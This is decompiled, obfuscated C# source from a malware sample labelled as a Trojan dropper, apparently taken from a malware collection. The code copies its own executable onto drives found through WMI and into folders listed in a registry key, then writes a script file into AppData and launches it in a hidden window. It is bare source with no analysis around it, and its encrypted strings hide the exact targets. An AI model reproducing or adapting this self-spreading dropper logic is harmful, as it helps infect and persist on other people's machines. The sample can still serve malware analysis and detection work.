// Decompiled with JetBrains decompiler // Type: . // Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null // MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99 // Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe using \u0001; using \u000E; using Microsoft.Win32; using System; using System.Diagnostics; using System.IO; using System.Management; using System.Threading; namespace \u000E { internal sealed class \u0007 { [NonSerialized] internal static \u0002 \u0001; private static \u0008 \u0001; private string \u0001 = Convert.ToString(Process.GetCurrentProcess().MainModule.FileName); public static void \u000F() => new \u0007().\u0010(); public void \u0010() { try { foreach (ManagementObject managementObject in new ManagementObjectSearcher(\u0007.\u0001(6807)).Get()) { Thread.Sleep(50); string str = Convert.ToString(managementObject[\u0007.\u0001(6844)]); if (!str.Contains(\u0007.\u0001(1724))) File.Copy(this.\u0001, \u0007.\u0001(6853) + Environment.MachineName + \u0007.\u0001(1979) + str + \u0007.\u0001(6858), true); } } catch (Exception ex) { \u0007.\u0001.\u0010(ex.ToString()); } try { string name = \u0007.\u0001(6887); RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(name); foreach (string valueName in registryKey.GetValueNames()) { Thread.Sleep(50); string str = registryKey.GetValue(valueName).ToString(); if (valueName.ToLower() != \u0007.\u0001(6988)) { try { File.Copy(this.\u0001, str + \u0007.\u0001(7001), true); } catch (Exception ex) { } } } registryKey.Close(); } catch (Exception ex) { \u0007.\u0001.\u0010(ex.ToString()); } } public static void \u0011() { if (File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0007.\u0001(7030))) return; StreamWriter streamWriter = new StreamWriter(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0007.\u0001(7030)); streamWriter.WriteLine(\u0007.\u0001(7043)); streamWriter.WriteLine(\u0007.\u0001(7072)); streamWriter.WriteLine(\u0007.\u0001(7097)); streamWriter.WriteLine(\u0007.\u0001(7138)); streamWriter.WriteLine(\u0007.\u0001(7203)); streamWriter.WriteLine(\u0007.\u0001(7272)); streamWriter.WriteLine(\u0007.\u0001(7345)); streamWriter.WriteLine(\u0007.\u0001(7414)); streamWriter.WriteLine(\u0007.\u0001(7483)); streamWriter.WriteLine(\u0007.\u0001(7556)); streamWriter.WriteLine(\u0007.\u0001(7625)); streamWriter.WriteLine(\u0007.\u0001(7702)); streamWriter.WriteLine(\u0007.\u0001(7779)); streamWriter.WriteLine(\u0007.\u0001(1784)); streamWriter.Close(); new Process() { StartInfo = { WindowStyle = ProcessWindowStyle.Hidden, FileName = (Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0007.\u0001(7030)) } }.Start(); try { File.Delete(Path.Combine(Directory.GetCurrentDirectory(), \u0007.\u0001(7856))); } catch { } } static \u0007() { \u0003.\u000F(); \u0007.\u0001 = new \u0008(); } } }